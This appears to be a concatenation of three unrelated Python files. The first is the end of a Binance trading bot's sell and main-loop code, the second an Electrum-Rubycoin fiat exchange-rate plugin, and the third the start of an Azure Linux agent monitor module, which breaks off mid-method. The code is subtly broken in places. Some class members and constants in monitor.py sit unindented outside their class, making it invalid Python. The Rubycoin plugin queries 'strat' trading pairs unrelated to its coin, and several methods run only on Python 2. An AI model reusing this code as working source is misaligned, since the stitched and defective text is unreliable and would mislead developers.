        # check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
        if LastPrice > TP and USE_TRAILING_STOP_LOSS:
            # increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
            coins_bought[coin]['take_profit'] = PriceChange + TRAILING_TAKE_PROFIT
            coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
            if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit")
            continue
        # check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
        # NOTE: precedence is `external OR below-SL OR (above-TP AND not trailing)`
        if coin in externals or LastPrice < SL or LastPrice > TP and not USE_TRAILING_STOP_LOSS:
            print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}")
            if PriceChange >= 0:
                trades_won += 1
                # with limit-sell bookkeeping, record the TP price instead of spot
                if USE_BINANCE_LIMIT_SELL:
                    LastPrice = TP
            else:
                trades_lost += 1
                if USE_BINANCE_LIMIT_SELL:
                    LastPrice = SL
            if USE_BINANCE_LIMIT_SELL:
                # recompute the change from the adjusted price
                PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
            # try to create a real order
            try:
                if not TEST_MODE:
                    sell_coins_limit = client.create_order(
                        symbol = coin,
                        side = 'SELL',
                        type = 'MARKET',
                        quantity = coins_bought[coin]['volume']
                    )
            # error handling here in case position cannot be placed
            except Exception as e:
                print(e)
            # run the else block if coin has been sold and create a dict for each coin sold
            else:
                coins_sold[coin] = coins_bought[coin]
                # prevent system from buying this coin for the next TIME_DIFFERENCE minutes
                volatility_cooloff[coin] = datetime.now()
                # Log trade
                if LOG_TRADES:
                    profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here
                    write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%")
                    write_log(f"trades won: {trades_won}, trades lost: {trades_lost}")
                session_profit=session_profit + (PriceChange-(TRADING_FEE*2))/MAX_COINS
            continue
        # no action; print once every TIME_DIFFERENCE
        if hsp_head == 1:
            if len(coins_bought) > 0:
                print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}')
    # check if session target has been met
    if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins')
    return coins_sold
def check_total_session_profit(coins_bought, last_price):
    '''Stop the bot when the whole session's P/L crosses the configured thresholds.

    Combines the realized session_profit with the unrealized change of every
    open position and flips is_bot_running off once SESSION_TAKE_PROFIT or
    SESSION_STOP_LOSS is met.
    '''
    global session_profit, is_bot_running
    BUDGET = MAX_COINS * QUANTITY
    TotalSessionChange = session_profit
    # fold in the unrealized, fee-adjusted change of each open position
    for coin in list(coins_bought):
        bought = float(coins_bought[coin]['bought_at'])
        current = float(last_price[coin]['price'])
        change_pct = float((current - bought) / bought * 100)
        TotalSessionChange = float(TotalSessionChange + (change_pct - (TRADING_FEE*2)) / MAX_COINS)
    print(f'ACTUAL session profit: {TotalSessionChange:.2f}% Est:${TotalSessionChange/100 * BUDGET:.2f}')
    if TotalSessionChange >= SESSION_TAKE_PROFIT or TotalSessionChange <= -SESSION_STOP_LOSS:
        print(f'Session target %{TotalSessionChange:.2f} met or exceeded targets. Sell all coins now!')
        is_bot_running = False
        #TODO: call sell-remaining-coins
def update_portfolio(orders, last_price, volume):
    '''add every coin bought to our portfolio for tracking/selling later'''
    if DEBUG: print(orders)
    for coin in orders:
        placed = orders[coin][0]
        coins_bought[coin] = {
            'symbol': placed['symbol'],
            'orderid': placed['orderId'],
            'timestamp': placed['time'],
            'bought_at': last_price[coin]['price'],
            'volume': volume[coin],
            'stop_loss': -STOP_LOSS,
            'take_profit': TAKE_PROFIT,
        }
        # persist the portfolio after every addition so a crash loses nothing
        with open(coins_bought_file_path, 'w') as file:
            json.dump(coins_bought, file, indent=4)
        print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
    '''Remove coins sold due to SL or TP from portfolio'''
    for sold in coins_sold:
        coins_bought.pop(sold)
        # rewrite the portfolio file so it always mirrors the in-memory state
        with open(coins_bought_file_path, 'w') as file:
            json.dump(coins_bought, file, indent=4)
def write_log(logline):
    '''Append a timestamped line to the configured trade log file.'''
    stamp = datetime.now().strftime("%d/%m %H:%M:%S")
    with open(LOG_FILE, 'a+') as log_file:
        log_file.write(stamp + ' ' + logline + '\n')
if __name__ == '__main__':
    # Load arguments then parse settings
    args = parse_args()
    mymodule = {}

    # set to false at Start
    global bot_paused
    bot_paused = False

    DEFAULT_CONFIG_FILE = 'config.yml'
    DEFAULT_CREDS_FILE = 'creds.yml'

    config_file = args.config if args.config else DEFAULT_CONFIG_FILE
    creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
    parsed_config = load_config(config_file)
    parsed_creds = load_config(creds_file)

    # Default no debugging
    DEBUG = False

    # Load system vars
    TEST_MODE = parsed_config['script_options']['TEST_MODE']
    LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
    LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
    DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
    AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')

    # Load trading vars
    PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
    QUANTITY = parsed_config['trading_options']['QUANTITY']
    MAX_COINS = parsed_config['trading_options']['MAX_COINS']
    FIATS = parsed_config['trading_options']['FIATS']
    TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
    RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
    CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
    STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
    TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
    CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
    TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
    USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
    TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
    TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
    TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
    SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
    USE_SESSION_THRESHOLD = parsed_config['trading_options']['USE_SESSION_THRESHOLD']
    SESSION_TAKE_PROFIT = parsed_config['trading_options']['SESSION_TAKE_PROFIT']
    SESSION_STOP_LOSS = parsed_config['trading_options']['SESSION_STOP_LOSS']
    USE_BINANCE_LIMIT_SELL = parsed_config['trading_options']['USE_BINANCE_LIMIT_SELL']

    if DEBUG_SETTING or args.debug:
        DEBUG = True

    # Load creds for correct environment
    access_key, secret_key = load_correct_creds(parsed_creds)

    if DEBUG:
        print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
        print(f'Your credentials have been loaded from {creds_file}')

    # Authenticate with the client, Ensure API key is good before continuing
    if AMERICAN_USER:
        client = Client(access_key, secret_key, tld='us')
    else:
        client = Client(access_key, secret_key)

    # If the users has a bad / incorrect API key.
    # this will stop the script from starting, and display a helpful error.
    api_ready, msg = test_api_key(client, BinanceAPIException)
    if api_ready is not True:
        exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')

    # Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
    if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]

    # try to load all the coins bought by the bot if the file exists and is not empty
    coins_bought = {}
    # path to the saved coins_bought file
    coins_bought_file_path = 'coins_bought.json'
    # rolling window of prices; cyclical queue
    historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
    hsp_head = -1
    # prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
    volatility_cooloff = {}

    # use separate files for testing and live trading
    if TEST_MODE:
        coins_bought_file_path = 'test_' + coins_bought_file_path

    # if saved coins_bought json file exists and it's not empty then load it
    if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size != 0:
        with open(coins_bought_file_path) as file:
            coins_bought = json.load(file)

    print('Press Ctrl-Q to stop the script')

    if not TEST_MODE:
        if not args.notimeout: # if notimeout skip this (fast for dev tests)
            print('WARNING: You are using the Mainnet and live funds. Waiting 30 seconds as a security measure')
            time.sleep(30)

    # Remove stale external signal files from a previous run.
    # BUGFIX: the old code opened each file and attempted os.remove() once per
    # line, leaking the file handle and silently retrying a removal that had
    # already succeeded; one removal per file is sufficient.
    signals = glob.glob("signals/*.exs")
    for filename in signals:
        try:
            os.remove(filename)
        except OSError:
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file (unknown){txcolors.DEFAULT}')

    if os.path.isfile("signals/paused.exc"):
        try:
            os.remove("signals/paused.exc")
        except OSError:
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file (unknown){txcolors.DEFAULT}')

    # load signalling modules
    try:
        if len(SIGNALLING_MODULES) > 0:
            for module in SIGNALLING_MODULES:
                print(f'Starting {module}')
                mymodule[module] = importlib.import_module(module)
                t = threading.Thread(target=mymodule[module].do_work, args=())
                t.daemon = True
                t.start()
                time.sleep(2)
        else:
            print(f'No modules to load {SIGNALLING_MODULES}')
    except Exception as e:
        print(e)

    # seed initial prices
    get_price()
    while is_bot_running:
        orders, last_price, volume = buy()
        update_portfolio(orders, last_price, volume)
        coins_sold = sell_coins()
        remove_from_portfolio(coins_sold)
|
exchange_rate.py | from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from electrum_rubycoin.rubycoin import COIN
from electrum_rubycoin.plugins import BasePlugin, hook
from electrum_rubycoin.i18n import _
from electrum_rubycoin.util import PrintError, ThreadJob
from electrum_rubycoin.util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
    """Base class for fiat exchange-rate backends.

    Subclasses implement get_rates() (and optionally history_ccys() /
    historical_rates()); network fetches run on daemon threads and results
    are delivered via the on_quotes / on_history callbacks.
    """
    def __init__(self, on_quotes, on_history):
        # ccy -> {date string: rate} cache filled by get_historical_rates_safe
        self.history = {}
        # ccy -> rate mapping of the latest spot quotes
        self.quotes = {}
        self.on_quotes = on_quotes
        self.on_history = on_history

    def protocol(self):
        """URL scheme; subclasses may override to use plain http."""
        return "https"

    def get_json(self, site, get_string):
        """GET <protocol>://<site><get_string> and return the parsed JSON body."""
        url = "".join([self.protocol(), '://', site, get_string])
        response = requests.request('GET', url,
                                    headers={'User-Agent' : 'Electrum'})
        return response.json()

    def get_csv(self, site, get_string):
        """GET a CSV document and return it as a list of row dicts."""
        url = "".join([self.protocol(), '://', site, get_string])
        response = requests.request('GET', url,
                                    headers={'User-Agent' : 'Electrum'})
        # NOTE(review): response.content is bytes on Python 3, where
        # .split('\n') would raise TypeError -- this assumes Python 2 str.
        reader = csv.DictReader(response.content.split('\n'))
        return list(reader)

    def name(self):
        return self.__class__.__name__

    def update_safe(self, ccy):
        # Fetch quotes, swallowing any failure; always fires the callback.
        try:
            self.print_error("getting fx quotes for", ccy)
            self.quotes = self.get_rates(ccy)
            self.print_error("received fx quotes")
        except BaseException as e:
            self.print_error("failed fx quotes:", e)
        self.on_quotes()

    def update(self, ccy):
        """Refresh spot quotes for ccy on a background daemon thread."""
        t = Thread(target=self.update_safe, args=(ccy,))
        t.setDaemon(True)
        t.start()

    def get_historical_rates_safe(self, ccy):
        # Fetch and cache historical rates; callback only fires on success.
        try:
            self.print_error("requesting fx history for", ccy)
            self.history[ccy] = self.historical_rates(ccy)
            self.print_error("received fx history for", ccy)
            self.on_history()
        except BaseException as e:
            self.print_error("failed fx history:", e)

    def get_historical_rates(self, ccy):
        """Return cached history for ccy, kicking off a background fetch if absent."""
        result = self.history.get(ccy)
        if not result and ccy in self.history_ccys():
            t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
            t.setDaemon(True)
            t.start()
        return result

    def history_ccys(self):
        """Currencies with historical data; base class supports none."""
        return []

    def historical_rate(self, ccy, d_t):
        """Cached rate for ccy on the given date (datetime), or None."""
        return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
class Bit2C(ExchangeBase):
    """Exchange backend returning rates for all currencies in one call.

    NOTE(review): despite the class name this queries api.bitcoinaverage.com;
    confirm whether the name or the endpoint is the stale one.
    """
    def get_rates(self, ccy):
        # Every key except 'timestamp' is a currency code with a 'last' price.
        json = self.get_json('api.bitcoinaverage.com', '/ticker/global/all')
        return dict([(r, Decimal(json[r]['last']))
                     for r in json if r != 'timestamp'])

    def history_ccys(self):
        return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
                'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
                'ZAR']

    def historical_rates(self, ccy):
        # Per-day averages keyed by the YYYY-MM-DD prefix of the DateTime column.
        history = self.get_csv('api.bitcoinaverage.com',
                               "/history/%s/per_day_all_time_history.csv" % ccy)
        return dict([(h['DateTime'][:10], h['Average'])
                     for h in history])
class BitcoinVenezuela(ExchangeBase):
    """BitcoinVenezuela backend (plain HTTP endpoint)."""

    def get_rates(self, ccy):
        data = self.get_json('api.bitcoinvenezuela.com', '/')
        # The API sometimes reports null for a currency; drop those entries.
        return {code: rate for code, rate in data['RBY'].items()
                if rate is not None}

    def protocol(self):
        return "http"

    def history_ccys(self):
        return ['ARS', 'EUR', 'USD', 'VEF']

    def historical_rates(self, ccy):
        data = self.get_json('api.bitcoinvenezuela.com',
                             '/historical/index.php?coin=RBY')
        return data[ccy +'_RBY']
class Bitfinex(ExchangeBase):
    """Bitfinex public ticker; quotes USD only."""

    def get_rates(self, ccy):
        ticker = self.get_json('api.bitfinex.com', '/v1/pubticker/stratusd')
        return {'USD': Decimal(ticker['last_price'])}
class BTCChina(ExchangeBase):
    """BTCChina ticker; quotes CNY only."""

    def get_rates(self, ccy):
        ticker = self.get_json('data.btcchina.com', '/data/ticker?market=stratcny')
        return {'CNY': Decimal(ticker['ticker']['last'])}
class BTCe(ExchangeBase):
    """BTC-e ticker; fetches EUR, RUR and USD in a single request."""

    def get_rates(self, ccy):
        ccys = ['EUR', 'RUR', 'USD']
        pair_str = '-'.join('strat_%s' % c.lower() for c in ccys)
        ticker = self.get_json('btc-e.com', '/api/3/ticker/%s' % pair_str)
        return {c: Decimal(ticker['strat_%s' % c.lower()]['last'])
                for c in ccys}
class CaVirtEx(ExchangeBase):
    """CaVirtEx ticker; quotes CAD only."""

    def get_rates(self, ccy):
        ticker = self.get_json('www.cavirtex.com', '/api2/ticker.json?currencypair=RBYCAD')
        return {'CAD': Decimal(ticker['ticker']['RBYCAD']['last'])}
class CoinSpot(ExchangeBase):
    """CoinSpot ticker; quotes AUD only."""

    def get_rates(self, ccy):
        data = self.get_json('www.coinspot.com.au', '/pubapi/latest')
        return {'AUD': Decimal(data['prices']['strat']['last'])}
class GoCoin(ExchangeBase):
    """GoCoin price feed; returns every currency the endpoint lists."""

    def get_rates(self, ccy):
        prices = self.get_json('x.g0cn.com', '/prices')['prices']['RBY']
        return {code: Decimal(value) for code, value in prices.items()}
class HitBTC(ExchangeBase):
    """HitBTC ticker; supports EUR and USD."""
    def get_rates(self, ccy):
        ccys = ['EUR', 'USD']
        # The requested currency is interpolated directly into the ticker path.
        # NOTE(review): the request is issued even for unsupported ccys -- verify
        # whether that is intentional or should be guarded.
        json = self.get_json('api.hitbtc.com', '/api/1/public/RBY%s/ticker' % ccy)
        result = dict.fromkeys(ccys)
        # Only the requested currency gets a value; the other key stays None.
        if ccy in ccys:
            result[ccy] = Decimal(json['last'])
        return result
class Kraken(ExchangeBase):
    def get_rates(self, ccy):
        # Discover all XRBYZ* asset pairs, then fetch their tickers in one call.
        dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
        pairs = [k for k in dicts['result'] if k.startswith('XRBYZ')]
        json = self.get_json('api.kraken.com',
                             '/0/public/Ticker?pair=%s' % ','.join(pairs))
        # Currency code is the pair name minus the 5-char 'XRBYZ' prefix.
        ccys = [p[5:] for p in pairs]
        result = dict.fromkeys(ccys)
        # Only the requested ccy is filled; 'c' holds [last price, lot volume].
        result[ccy] = Decimal(json['result']['XRBYZ'+ccy]['c'][0])
        return result

    def history_ccys(self):
        return ['EUR', 'USD']

    def historical_rates(self, ccy):
        # Daily OHLC candles; index 0 is the unix open time, index 4 the close.
        query = '/0/public/OHLC?pair=RBY%s&interval=1440' % ccy
        json = self.get_json('api.kraken.com', query)
        history = json['result']['XRBYZ'+ccy]
        return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
                     for t in history])
class OKCoin(ExchangeBase):
    """OKCoin (China) ticker; quotes CNY only."""

    def get_rates(self, ccy):
        ticker = self.get_json('www.okcoin.cn', '/api/ticker.do?symbol=strat_cny')
        return {'CNY': Decimal(ticker['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
    """Mercado Bitcoin ticker; quotes BRL only."""

    def get_rates(self, ccy):
        ticker = self.get_json('mercadobitcoin.net',
                               "/api/ticker/ticker_rubycoin")
        return {'BRL': Decimal(ticker['ticker']['last'])}

    def history_ccys(self):
        return ['BRL']
class Bitcointoyou(ExchangeBase):
    """Bitcointoyou ticker; quotes BRL only."""

    def get_rates(self, ccy):
        ticker = self.get_json('bitcointoyou.com',
                               "/API/ticker_rubycoin.aspx")
        return {'BRL': Decimal(ticker['ticker']['last'])}

    def history_ccys(self):
        return ['BRL']
def dictinvert(d):
    """Invert a mapping of key -> list of values into value -> list of keys.

    Each value becomes a key whose list collects every original key that
    listed it.  Uses d.items() -- valid on both Python 2 and 3 -- instead of
    the Python-2-only d.iteritems(), which raises AttributeError on Python 3.
    """
    inv = {}
    for k, vlist in d.items():
        for v in vlist:
            inv.setdefault(v, []).append(k)
    return inv
def get_exchanges():
    """Return {class name: class} for every concrete exchange in this module."""
    def _is_exchange(obj):
        return (inspect.isclass(obj)
                and issubclass(obj, ExchangeBase)
                and obj is not ExchangeBase)
    return dict(inspect.getmembers(sys.modules[__name__], _is_exchange))
def get_exchanges_by_ccy():
    "return only the exchanges that have history rates (which is hardcoded)"
    # Map each exchange name to its supported history currencies, then flip
    # the mapping so each currency lists the exchanges supporting it.
    histories = {}
    for name, klass in get_exchanges().items():
        histories[name] = klass(None, None).history_ccys()
    return dictinvert(histories)
class FxThread(ThreadJob):
    """Periodic job that keeps fiat exchange rates (and optional history)
    current, driven by the user's config and notifying the network layer
    through trigger_callback."""
    def __init__(self, config, network):
        self.config = config
        self.network = network
        self.ccy = self.get_currency()
        # True once history_rate() had to fall back to a spot quote
        self.history_used_spot = False
        # UI widget handles, populated elsewhere
        self.ccy_combo = None
        self.hist_checkbox = None
        self.exchanges = get_exchanges()
        self.exchanges_by_ccy = get_exchanges_by_ccy()
        # also initializes self.timeout (to 0) via set_exchange
        self.set_exchange(self.config_exchange())

    def get_exchanges_by_ccy(self, ccy, h):
        # NOTE(review): parameter h is unused -- confirm against callers.
        return self.exchanges_by_ccy.get(ccy, [])

    def ccy_amount_str(self, amount, commas):
        """Format a fiat amount with the currency's ISO 4217 precision."""
        prec = CCY_PRECISIONS.get(self.ccy, 2)
        fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
        return fmt_str.format(round(amount, prec))

    def run(self):
        # This runs from the plugins thread which catches exceptions
        if self.is_enabled():
            # timeout == 0 signals a forced refresh (currency/exchange change)
            if self.timeout ==0 and self.show_history():
                self.exchange.get_historical_rates(self.ccy)
            if self.timeout <= time.time():
                # refresh quotes roughly every 150 seconds
                self.timeout = time.time() + 150
                self.exchange.update(self.ccy)

    def is_enabled(self):
        return bool(self.config.get('use_exchange_rate'))

    def set_enabled(self, b):
        return self.config.set_key('use_exchange_rate', bool(b))

    def get_history_config(self):
        return bool(self.config.get('history_rates'))

    def set_history_config(self, b):
        self.config.set_key('history_rates', bool(b))

    def get_currency(self):
        '''Use when dynamic fetching is needed'''
        return self.config.get("currency", "EUR")

    def config_exchange(self):
        return self.config.get('use_exchange', 'BTCe')

    def show_history(self):
        return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()

    def set_currency(self, ccy):
        self.ccy = ccy
        self.config.set_key('currency', ccy, True)
        self.timeout = 0 # Because self.ccy changes
        self.on_quotes()

    def set_exchange(self, name):
        # NOTE(review): values()[0] is Python 2 only -- dict views are not
        # indexable on Python 3.
        class_ = self.exchanges.get(name) or self.exchanges.values()[0]
        name = class_.__name__
        self.print_error("using exchange", name)
        if self.config_exchange() != name:
            self.config.set_key('use_exchange', name, True)
        self.exchange = class_(self.on_quotes, self.on_history)
        # A new exchange means new fx quotes, initially empty. Force
        # a quote refresh
        self.timeout = 0

    def on_quotes(self):
        self.network.trigger_callback('on_quotes')

    def on_history(self):
        self.network.trigger_callback('on_history')

    def exchange_rate(self):
        '''Returns None, or the exchange rate as a Decimal'''
        rate = self.exchange.quotes.get(self.ccy)
        if rate:
            return Decimal(rate)

    def format_amount_and_units(self, btc_balance):
        """Balance rendered in fiat with currency suffix, or '' without a rate."""
        rate = self.exchange_rate()
        return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)

    def get_fiat_status_text(self, btc_balance):
        """Status-bar text showing the fiat value of one coin."""
        rate = self.exchange_rate()
        return _(" (No FX rate available)") if rate is None else " 1 BTC~%s %s" % (self.value_str(COIN, rate), self.ccy)

    def value_str(self, satoshis, rate):
        """Fiat string for a satoshi amount at the given rate."""
        if satoshis is None: # Can happen with incomplete history
            return _("Unknown")
        if rate:
            value = Decimal(satoshis) / COIN * Decimal(rate)
            return "%s" % (self.ccy_amount_str(value, True))
        return _("No data")

    def history_rate(self, d_t):
        rate = self.exchange.historical_rate(self.ccy, d_t)
        # Frequently there is no rate for today, until tomorrow :)
        # Use spot quotes in that case
        if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
            rate = self.exchange.quotes.get(self.ccy)
            self.history_used_spot = True
        return rate

    def historical_value_str(self, satoshis, d_t):
        """Fiat string for a satoshi amount at the historical rate for d_t."""
        rate = self.history_rate(d_t)
        return self.value_str(satoshis, rate)
|
monitor.py | # Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import platform
import time
import threading
import traceback
import uuid
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.errorstate import ErrorState
from azurelinuxagent.common.cgroups import CGroups, CGroupsTelemetry
from azurelinuxagent.common.event import add_event, report_metric, WALAEventOperation
from azurelinuxagent.common.exception import EventError, ProtocolError, OSUtilError, HttpError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol import get_protocol_util
from azurelinuxagent.common.protocol.healthservice import HealthService
from azurelinuxagent.common.protocol.imds import get_imds_client
from azurelinuxagent.common.protocol.restapi import TelemetryEventParam, \
TelemetryEventList, \
TelemetryEvent, \
set_properties
import azurelinuxagent.common.utils.networkutil as networkutil
from azurelinuxagent.common.utils.restutil import IOErrorCounter
from azurelinuxagent.common.utils.textutil import parse_doc, findall, find, getattrib, hash_strings
from azurelinuxagent.common.version import DISTRO_NAME, DISTRO_VERSION, \
DISTRO_CODE_NAME, AGENT_LONG_VERSION, \
AGENT_NAME, CURRENT_AGENT, CURRENT_VERSION
def parse_event(data_str):
    """Deserialize a telemetry event, accepting either JSON or legacy XML."""
    try:
        return parse_json_event(data_str)
    except ValueError:
        # Not valid JSON -- fall back to the XML representation.
        return parse_xml_event(data_str)
def parse_xml_param(param_node):
    """Convert an XML <Param> node into a TelemetryEventParam.

    The 'T' attribute declares the value type; the string value is coerced
    accordingly, defaulting to the raw string when the type is unknown.
    """
    name = getattrib(param_node, "Name")
    value_str = getattrib(param_node, "Value")
    attr_type = getattrib(param_node, "T")
    value = value_str
    if attr_type == 'mt:uint64':
        value = int(value_str)
    elif attr_type == 'mt:bool':
        # BUGFIX: bool(value_str) is True for ANY non-empty string, including
        # "False"/"false" -- compare against the textual value instead.
        value = value_str.lower() == 'true'
    elif attr_type == 'mt:float64':
        value = float(value_str)
    return TelemetryEventParam(name, value)
def parse_xml_event(data_str):
    """Parse a legacy XML-serialized telemetry event into a TelemetryEvent.

    Any parsing failure is re-raised as ValueError so callers can handle XML
    and JSON decode errors uniformly.
    """
    try:
        doc = parse_doc(data_str)
        evt_id = getattrib(find(doc, "Event"), 'id')
        prov_id = getattrib(find(doc, "Provider"), 'id')
        event = TelemetryEvent(evt_id, prov_id)
        for node in findall(doc, 'Param'):
            event.parameters.append(parse_xml_param(node))
        return event
    except Exception as e:
        raise ValueError(ustr(e))
def parse_json_event(data_str):
    """Deserialize a JSON-encoded telemetry event (ValueError on bad JSON)."""
    payload = json.loads(data_str)
    event = TelemetryEvent()
    set_properties("TelemetryEvent", event, payload)
    return event
def get_monitor_handler():
    """Factory for the agent's monitor handler."""
    return MonitorHandler()
class MonitorHandler(object):
EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
TELEMETRY_HEARTBEAT_PERIOD = datetime.timedelta(minutes=30)
CGROUP_TELEMETRY_PERIOD = datetime.timedelta(minutes=5)
# host plugin
HOST_PLUGIN_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
HOST_PLUGIN_HEALTH_PERIOD = datetime.timedelta(minutes=5)
# imds
IMDS_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
IMDS_HEALTH_PERIOD = datetime.timedelta(minutes=3)
    def __init__(self):
        # Platform and protocol helpers
        self.osutil = get_osutil()
        self.protocol_util = get_protocol_util()
        self.imds_client = get_imds_client()
        # Background thread running self.daemon()
        self.event_thread = None
        # Last-run timestamps for each periodic task (None = never run)
        self.last_event_collection = None
        self.last_telemetry_heartbeat = None
        self.last_cgroup_telemetry = None
        self.last_host_plugin_heartbeat = None
        self.last_imds_heartbeat = None
        # Populated later by init_protocols()
        self.protocol = None
        self.health_service = None
        # Snapshots used to detect altered network configuration
        self.last_route_table_hash = b''
        self.last_nic_state = {}
        # Monotonic heartbeat counter and a per-process heartbeat identifier
        self.counter = 0
        self.sysinfo = []
        self.should_run = True
        self.heartbeat_id = str(uuid.uuid4()).upper()
        # Error accumulators gating the 'healthy' signal per endpoint
        self.host_plugin_errorstate = ErrorState(min_timedelta=MonitorHandler.HOST_PLUGIN_HEALTH_PERIOD)
        self.imds_errorstate = ErrorState(min_timedelta=MonitorHandler.IMDS_HEALTH_PERIOD)
    def run(self):
        # Initialize protocol, system info and cgroup tracking, then start
        # the monitor thread.
        self.init_protocols()
        self.init_sysinfo()
        self.init_cgroups()
        self.start()
    def stop(self):
        # Signal the daemon loop to exit and wait for the thread to finish.
        self.should_run = False
        if self.is_alive():
            self.event_thread.join()
    def init_protocols(self):
        # Resolve the wire protocol and point the health service at its endpoint.
        self.protocol = self.protocol_util.get_protocol()
        self.health_service = HealthService(self.protocol.endpoint)
def is_alive(self):
return self.event_thread is not None and self.event_thread.is_alive()
def start(self):
self.event_thread = threading.Thread(target=self.daemon)
self.event_thread.setDaemon(True)
self.event_thread.start()
    def init_sysinfo(self):
        # Build the static system-info parameter list attached to every
        # telemetry event; each source is fetched best-effort with a warning
        # on failure so telemetry still flows with partial info.
        osversion = "{0}:{1}-{2}-{3}:{4}".format(platform.system(),
                                                 DISTRO_NAME,
                                                 DISTRO_VERSION,
                                                 DISTRO_CODE_NAME,
                                                 platform.release())
        self.sysinfo.append(TelemetryEventParam("OSVersion", osversion))
        self.sysinfo.append(
            TelemetryEventParam("GAVersion", CURRENT_AGENT))
        # Hardware facts from the OS utility layer
        try:
            ram = self.osutil.get_total_mem()
            processors = self.osutil.get_processor_cores()
            self.sysinfo.append(TelemetryEventParam("RAM", ram))
            self.sysinfo.append(TelemetryEventParam("Processors", processors))
        except OSUtilError as e:
            logger.warn("Failed to get system info: {0}", e)
        # VM identity from the wire protocol
